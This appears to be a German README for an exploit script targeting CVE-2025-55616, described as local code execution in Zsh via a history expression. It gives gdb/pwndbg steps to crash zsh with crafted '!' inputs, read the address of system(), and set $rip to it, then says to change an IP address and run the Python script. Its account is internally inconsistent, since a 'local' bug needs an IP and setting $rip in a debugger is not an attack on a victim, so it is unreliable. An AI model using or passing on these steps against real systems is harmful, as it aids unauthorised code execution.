
Exploit für CVE-2025-55616, eine lokale RCE in Zsh über einen History-Ausdruck, die eine beliebige Codeausführung mit Benutzerrechten ermöglicht.
Um diesen Exploit auszuführen: ändere einfach die IP-Adresse und das "p system" im Exploit, weil ich das auch auf meinem zweiten Laptop ausprobiert habe, und um es zu ändern, führe den folgenden Befehl in gdb aus (besonders in pwndbg):
$ gdb zsh -f (im Terminal)
pwndbg> run -f
username% ! (username wird deiner sein, schreibe einfach ! )
username% !!11111111111 (hier genauso, schreibe einfach !!11111111111 )
pwndbg> p system
Nachdem du die "p system"-Adresse erhalten hast, ändere sie einfach in
b'set $rip = 0x7ffff7cc9110', (verwende deine p system-Adresse anstelle von 0x7ffff7cc9110
Diese Schwachstelle ermöglicht es lokalen Angreifern, eine Arbitrary Code Execution (RCE) mit den Rechten des Benutzers zu erreichen, der den Zsh-Prozess ausführt.
python3 CVE-2025-55616.py